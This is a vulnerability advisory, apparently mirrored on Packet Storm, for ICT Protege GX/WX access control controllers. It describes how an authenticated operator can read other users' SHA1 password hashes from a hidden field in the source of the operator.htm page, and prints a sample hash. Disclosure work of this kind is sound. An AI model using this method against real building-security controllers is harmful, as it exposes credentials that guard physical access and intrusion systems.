ICT Protege GX/WX 2.08 Client-Side SHA1 Password Hash Disclosure ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        
ICT Protege GX/WX 2.08 Client-Side SHA1 Password Hash Disclosure
Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
Lib: 04.00.217
Int: 2.3.235.J013
OS: 2.0.20
WX: Ver: 4.00 284 H062
App: 02.08.766
Lib: 04.00.169
Int: 02.2.208
Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.
Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.
Tested on: Microsoft-WinCE/6.00
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php
08.02.2022
--
Navigate to http://CONTROLLER_IP/operator.htm
Source:
<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (76,974)
• Arbitrary^[21] (15,003)
• BBS^[22] (2,859)
• Bypass^[23] (1,534)
• CGI^[24] (1,010)
• Code Execution^[25] (6,581)
• Conference^[26] (668)
• Cracker^[27] (797)
• CSRF^[28] (3,259)
• DoS^[29] (21,647)
• Encryption^[30] (2,325)
• Exploit^[31] (49,412)
• File Inclusion^[32] (4,128)
• File Upload^[33] (934)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,538)
• Intrusion Detection^[36] (847)
• Java^[37] (2,762)
• JavaScript^[38] (791)
• Kernel^[39] (5,955)
• Local^[40] (13,937)
• Magazine^[41] (586)
• Overflow^[42] (12,090)
• Perl^[43] (1,410)
• PHP^[44] (5,032)
• Proof of Concept^[45] (2,275)
• Protocol^[46] (3,265)
• Python^[47] (1,375)
• Remote^[48] (29,482)
• Root^[49] (3,439)
• Ruby^[50] (574)
• Scanner^[51] (1,629)
• Security Tool^[52] (7,656)
• Shell^[53] (3,030)
• Shellcode^[54] (1,200)
• Sniffer^[55] (878)
• Spoof^[56] (2,072)
• SQL Injection^[57] (15,932)
• TCP^[58] (2,348)
• Trojan^[59] (668)
• UDP^[60] (866)
• Virus^[61] (657)
• Vulnerability^[62] (30,282)
• Web^[63] (8,922)
• Whitepaper^[64] (3,704)
• x86^[65] (942)
• XSS^[66] (17,253)
• Other^[67]

File Archives

• March 2022^[68]
• February 2022^[69]
• January 2022^[70]
• December 2021^[71]
• November 2021^[72]
• October 2021^[73]
• September 2021^[74]
• August 2021^[75]
• July 2021^[76]
• June 2021^[77]
• May 2021^[78]
• April 2021^[79]
• Older^[80]

Systems

• AIX^[81] (424)
• Apple^[82] (1,873)
• BSD^[83] (368)
• CentOS^[84] (55)
• Cisco^[85] (1,911)
• Debian^[86] (5,947)
• Fedora^[87] (1,690)
• FreeBSD^[88] (1,241)
• Gentoo^[89] (4,152)
• HPUX^[90] (876)
• iOS^[91] (314)
• iPhone^[92] (108)
• IRIX^[93] (220)
• Juniper^[94] (67)
• Linux^[95] (41,672)
• Mac OS X^[96] (683)
• Mandriva^[97] (3,105)
• NetBSD^[98] (255)
• OpenBSD^[99] (477)
• RedHat^[100] (11,189)
• Slackware^[101] (941)
• Solaris^[102] (1,605)
• SUSE^[103] (1,444)
• Ubuntu^[104] (7,674)
• UNIX^[105] (9,037)
• UnixWare^[106] (183)
• Windows^[107] (6,309)
• Other^[108]

© 2020 Packet Storm. All rights reserved.